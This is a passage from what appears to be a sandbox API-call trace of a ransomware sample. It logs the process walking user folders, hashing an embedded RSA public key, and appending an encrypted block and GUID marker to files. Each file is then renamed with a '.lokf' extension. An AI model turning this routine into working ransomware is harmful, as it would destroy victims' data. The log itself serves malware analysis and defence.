szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.099] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.099] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.099] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.099] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.099] GetLastError () returned 0x0 [0061.099] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.099] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.099] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.099] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.099] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.099] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.099] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.100] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa02d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.100] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.100] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.100] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.100] CloseHandle (hObject=0x5cc) returned 1 [0061.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0061.101] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\zezODkThIh8LWRpIgH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\zezodkthih8lwrpigh.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\zezODkThIh8LWRpIgH.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\zezodkthih8lwrpigh.flv.lokf")) returned 1 [0061.102] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7dffa1d0, ftCreationTime.dwHighDateTime=0x1d4c9ac, ftLastAccessTime.dwLowDateTime=0xd4c02cd0, ftLastAccessTime.dwHighDateTime=0x1d4d3e6, ftLastWriteTime.dwLowDateTime=0xd4c02cd0, ftLastWriteTime.dwHighDateTime=0x1d4d3e6, nFileSizeHigh=0x0, nFileSizeLow=0xa02d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zezODkThIh8LWRpIgH.flv", cAlternateFileName="ZEZODK~1.FLV")) returned 0 [0061.102] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0061.102] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262dc8 | out: hHeap=0x660000) returned 1 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0061.102] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32add78 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adc48 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262e70 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b88b8 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262d20 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262bd0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262f18 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adf40 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c7a728 | out: hHeap=0x660000) returned 1 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adf40 [0061.103] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.103] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.103] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.104] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.104] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0061.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0061.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0061.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0061.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.106] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.106] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.106] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.106] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.106] PathFindFileNameW (pszPath="") returned="" [0061.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.207] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adce0 | out: hHeap=0x660000) returned 1 [0061.207] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.207] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0061.208] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0061.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.209] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=42495) returned 1 [0061.209] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.211] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.211] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.213] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa5ff, lpOverlapped=0x0) returned 1 [0061.214] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.214] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.214] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.215] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b88b8) returned 1 [0061.215] CryptCreateHash (in: hProv=0x6b88b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.215] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.215] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.215] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.215] GetLastError () returned 0x0 [0061.215] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.216] CryptReleaseContext (hProv=0x6b88b8, dwFlags=0x0) returned 1 [0061.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.216] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.216] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.216] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.216] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.216] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa5ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.216] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.217] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.217] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.217] CloseHandle (hObject=0x5cc) returned 1 [0061.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0061.218] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.218] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0061.218] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.lokf" (normalized: 